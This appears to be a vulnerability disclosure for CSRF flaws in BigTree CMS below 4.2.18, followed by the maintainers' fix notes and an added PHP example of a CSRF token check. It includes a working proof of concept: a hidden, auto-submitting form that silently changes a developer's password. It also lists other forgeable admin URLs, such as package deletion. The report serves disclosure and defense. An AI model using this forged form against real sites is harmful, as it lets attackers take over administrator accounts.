Multiple Security Issues of CSRF exist in BigTree CMS Less than 4.2.18
one

with the name, password, company parameters to the \BigTree-CMS-4.2.18\core\admin\modules\users\profile\update.php

poc, updateprofile.php:

```php
<?php
$s = "<form method='post' action='http://www.victim.com/BigTree-CMS-4.2.18/site/index.php/admin/users/profile/update/'>";
$s = $s."<input type='text' value='Developer' name='name' style='display:none!important;display:block;width=0;height=0' />";
$s = $s."<input type='text' value='123123' name='password' style='display:none!important;display:block;width=0;height=0' />";
$s = $s."<input type='text' value='123123' name='company' style='display:none!important;display:block;width=0;height=0' />";
$s = $s."</form>";
$s = $s."<script>document.forms[0].submit();</script>";
echo($s);
?>
```
Request http://www.attack.com/updateprofile.php, then you will update the developer user's profile.

Other CSRF vulns:

http://localhost/BigTree-CMS-4.2.18/site/index.php/admin/developer/packages/delete/111/
http://localhost/BigTree-CMS-4.2.18/site/index.php/admin/developer/upgrade/ignore/?versions=%5B%224.2.18%22%5D
http://localhost/BigTree-CMS-4.2.18/site/index.php/admin/developer/upgrade/set-ftp-directory/

Repair: you may use the verifyCSRFToken() function before doing these.

Thank you!
email:xfkxfk@secbook.com
Fixing CSRF problems in profile update and package delete.
898b8da
#293
Fixed a few more benign CSRF exploits:
4c31ad1
Fixed, thanks!
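
One way to implement the kind of check the report asks for in front of handlers such as the profile update and package delete, shown as an added example that is not BigTree's own `verifyCSRFToken()` code. The function names and the in-memory session array are assumptions made for illustration.

```php
<?php
// Added example, not BigTree code. All function names here are hypothetical.

// Return the per-session CSRF token, creating it on first use.
function example_csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 64 hex chars from a CSPRNG
    }
    return $session['csrf_token'];
}

// Decide whether a state-changing request may proceed.
// $method is the HTTP method, $submitted the token field from the form body (null if absent).
function example_verify_csrf(array $session, string $method, ?string $submitted): bool {
    // State changes must not ride on GET: a link or image tag on another site triggers a GET.
    if (strtoupper($method) !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    if ($expected === '' || !is_string($submitted) || $submitted === '') {
        return false;
    }
    // hash_equals compares in constant time, so the token cannot be guessed byte by byte.
    return hash_equals($expected, $submitted);
}

// Constructed demonstration using a plain array in place of $_SESSION.
$session = [];
$token = example_csrf_token($session);

$cases = [
    'same-site form with token'   => ['POST', $token],
    'cross-site auto-submit form' => ['POST', null],               // no token field, like the reported form
    'forged token'                => ['POST', str_repeat('0', 64)],
    'GET to a delete-style URL'   => ['GET',  $token],
];
foreach ($cases as $label => [$method, $submitted]) {
    $ok = example_verify_csrf($session, $method, $submitted);
    printf("%-30s %s\n", $label, $ok ? 'accepted' : 'rejected');
}
```

Only the first case is accepted; the legitimate admin form would embed the value from `example_csrf_token()` in a hidden field, which a page on another origin cannot read.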